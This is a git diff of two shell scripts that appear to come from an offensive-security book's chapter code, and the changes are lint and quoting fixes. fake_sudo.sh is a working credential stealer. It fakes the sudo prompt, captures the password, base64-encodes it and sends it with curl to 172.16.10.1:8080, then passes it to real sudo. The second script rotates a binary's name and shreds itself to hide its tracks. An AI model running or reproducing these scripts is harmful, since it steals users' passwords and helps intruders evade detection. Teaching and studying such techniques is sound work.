diff --git a/ch10/fake_sudo.sh b/ch10/fake_sudo.sh
index 9c4765b..426168b 100644
--- a/ch10/fake_sudo.sh
+++ b/ch10/fake_sudo.sh
@@ -1,15 +1,17 @@
 #!/bin/bash
+# shellcheck disable=SC2124
 ARGS="$@"
 
 leak_over_http() {
     local encoded_password
-    encoded_password=$(echo "${1}" | base64 | sed s'/[=+/]//'g)
+    encoded_password=$(echo "${1}" | base64 | sed 's/[=+/]//g')
     curl -m 5 -s -o /dev/null "http://172.16.10.1:8080/${encoded_password}"
 }
 
 stty -echo
 read -r -p "[sudo] password for $(whoami): " sudopassw
-
+    
 leak_over_http "${sudopassw}"
 stty echo
+# shellcheck disable=SC2086
 echo "${sudopassw}" | /usr/bin/sudo -p "" -S -k ${ARGS}
diff --git a/ch12/binary_name_rotation.sh b/ch12/binary_name_rotation.sh
index c04f422..1548ac7 100644
--- a/ch12/binary_name_rotation.sh
+++ b/ch12/binary_name_rotation.sh
@@ -6,7 +6,7 @@ BIN_FILE="${RANDOM_BIN_NAMES[${RANDOMIZE}]}"
 FULL_BIN_PATH="${WORK_DIR}/${BIN_FILE}"
 
 self_removal(){
-  shred -u -- "$(basename $0)" && rm -f -- "${FULL_BIN_PATH}"
+  shred -u -- "$(basename "$0")" && rm -f -- "${FULL_BIN_PATH}"
 }
 
 if command -v curl 1> /dev/null; then